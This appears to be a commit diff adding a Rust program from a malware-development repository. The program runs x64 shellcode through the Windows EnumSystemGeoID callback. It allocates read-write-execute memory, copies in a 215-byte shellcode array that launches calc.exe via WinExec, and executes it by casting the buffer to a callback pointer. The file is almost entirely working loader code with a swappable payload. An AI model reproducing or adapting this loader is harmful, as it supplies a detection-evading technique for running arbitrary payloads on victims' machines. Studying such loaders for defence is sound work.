|
| 1 | +// Shellcode Execution using EnumSystemGeoID |
| 2 | +// Author: @5mukx |
| 3 | + |
| 4 | +use std::{ |
| 5 | + // io::{Read, Write, stdout}, |
| 6 | + ptr::null_mut, |
| 7 | +}; |
| 8 | + |
| 9 | +use winapi::{ |
| 10 | + ctypes::c_void, |
| 11 | + um::{ |
| 12 | + errhandlingapi::GetLastError, |
| 13 | + memoryapi::VirtualAlloc, |
| 14 | + processthreadsapi::GetCurrentProcessId, |
| 15 | + winnls::{EnumSystemGeoID, GEO_ENUMPROC}, |
| 16 | + winnt::{MEM_COMMIT, PAGE_EXECUTE_READWRITE}, |
| 17 | + }, |
| 18 | +}; |
| 19 | + |
| 20 | + |
| 21 | +// => for debugging purpose ! |
| 22 | +// fn pause() { |
| 23 | +// let mut stdout = stdout(); |
| 24 | +// stdout.write(b"[*] Press Enter to continue ...\n").unwrap(); |
| 25 | +// stdout.flush().unwrap(); |
| 26 | +// std::io::stdin().read(&mut [0]).unwrap(); |
| 27 | +// } |
| 28 | + |
| 29 | +fn main() { |
| 30 | + execute_shellcode_callback(); |
| 31 | +} |
| 32 | + |
| 33 | +fn execute_shellcode_callback() { |
| 34 | + |
| 35 | + // my custom shellcode template: https://github.com/Whitecat18/Rust-for-Malware-Development/blob/fec232f5251fbacddd2e11fc29e6b0b2b342aaf0/Custom_Shellcode/calc_shellcode2.rs#L11 |
| 36 | + |
| 37 | + let shellcode: [u8; 215] = [ |
| 38 | + 0x48, 0x31, 0xdb, 0x65, 0x48, 0x8b, 0x1c, 0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x5b, |
| 39 | + 0x18, 0x48, 0x81, 0xc3, 0x20, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x1b, 0x48, 0x8b, 0x1b, 0x48, |
| 40 | + 0x8b, 0x1b, 0x48, 0x8b, 0x5b, 0x20, 0x49, 0x89, 0xd8, 0x41, 0x8b, 0x58, 0x3c, 0x4c, 0x01, |
| 41 | + 0xc3, 0x48, 0x31, 0xc9, 0x80, 0xc1, 0x88, 0x8b, 0x1c, 0x0b, 0x4c, 0x01, 0xc3, 0x49, 0x89, |
| 42 | + 0xd9, 0x4d, 0x31, 0xd2, 0x45, 0x8b, 0x51, 0x1c, 0x4d, 0x01, 0xc2, 0x4d, 0x31, 0xdb, 0x45, |
| 43 | + 0x8b, 0x59, 0x20, 0x4d, 0x01, 0xc3, 0x4d, 0x31, 0xe4, 0x45, 0x8b, 0x61, 0x24, 0x4d, 0x01, |
| 44 | + 0xc4, 0x48, 0x31, 0xc9, 0x80, 0xc1, 0x07, 0x48, 0x31, 0xc0, 0x50, 0x48, 0xb8, 0x57, 0x69, |
| 45 | + 0x6e, 0x45, 0x78, 0x65, 0x63, 0x00, 0x50, 0x48, 0x89, 0xe3, 0xe8, 0x33, 0x00, 0x00, 0x00, |
| 46 | + 0x49, 0x89, 0xc5, 0x48, 0x31, 0xc9, 0x48, 0x31, 0xd2, 0x51, 0x48, 0xb9, 0x63, 0x61, 0x6c, |
| 47 | + 0x63, 0x2e, 0x65, 0x78, 0x65, 0x51, 0x48, 0x89, 0xe1, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, |
| 48 | + 0x00, 0x00, 0x00, 0x00, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0x48, 0x81, 0xec, 0x20, |
| 49 | + 0x00, 0x00, 0x00, 0x41, 0xff, 0xd5, 0x48, 0x31, 0xc0, 0x51, 0x48, 0x31, 0xff, 0x48, 0x8b, |
| 50 | + 0x0c, 0x24, 0x48, 0x89, 0xde, 0x41, 0x8b, 0x3c, 0x83, 0x4c, 0x01, 0xc7, 0xf3, 0xa6, 0x74, |
| 51 | + 0x05, 0x48, 0xff, 0xc0, 0xeb, 0xe6, 0x59, 0x66, 0x41, 0x8b, 0x04, 0x44, 0x41, 0x8b, 0x04, |
| 52 | + 0x82, 0x4c, 0x01, 0xc0, 0xc3, |
| 53 | + ]; |
| 54 | + |
| 55 | + |
| 56 | + unsafe { |
| 57 | + let proc_id = GetCurrentProcessId(); |
| 58 | + println!("[+] Process ID: {}", proc_id); |
| 59 | + |
| 60 | + let base_addr = VirtualAlloc( |
| 61 | + null_mut(), |
| 62 | + shellcode.len(), |
| 63 | + MEM_COMMIT, |
| 64 | + PAGE_EXECUTE_READWRITE, |
| 65 | + ); |
| 66 | + |
| 67 | + if base_addr.is_null() { |
| 68 | + println!("[-] Memory Allocation Failed"); |
| 69 | + return; |
| 70 | + } |
| 71 | + |
| 72 | + println!("[+] Memory allocated at: {:?}", base_addr); |
| 73 | + |
| 74 | + println!("[*] Copying shellcode..."); |
| 75 | + std::ptr::copy_nonoverlapping(shellcode.as_ptr(), base_addr as *mut u8, shellcode.len()); |
| 76 | + |
| 77 | + println!("[*] Executing Callback"); |
| 78 | + |
| 79 | + /* |
| 80 | + BOOL EnumSystemGeoID( |
| 81 | + [in] GEOCLASS GeoClass, |
| 82 | + [in] GEOID ParentGeoId, |
| 83 | + [in] GEO_ENUMPROC lpGeoEnumProc |
| 84 | + ); |
| 85 | + */ |
| 86 | + |
| 87 | + let result = EnumSystemGeoID( |
| 88 | + 16, |
| 89 | + 0, |
| 90 | + std::mem::transmute::<*mut c_void, GEO_ENUMPROC>(base_addr), |
| 91 | + ); |
| 92 | + |
| 93 | + if result > 0 { |
| 94 | + println!("[+] Execution successful!"); |
| 95 | + } else { |
| 96 | + println!("[-] Execution failed. Error code: {}", GetLastError()); |
| 97 | + } |
| 98 | + } |
| 99 | +} |
0 commit comments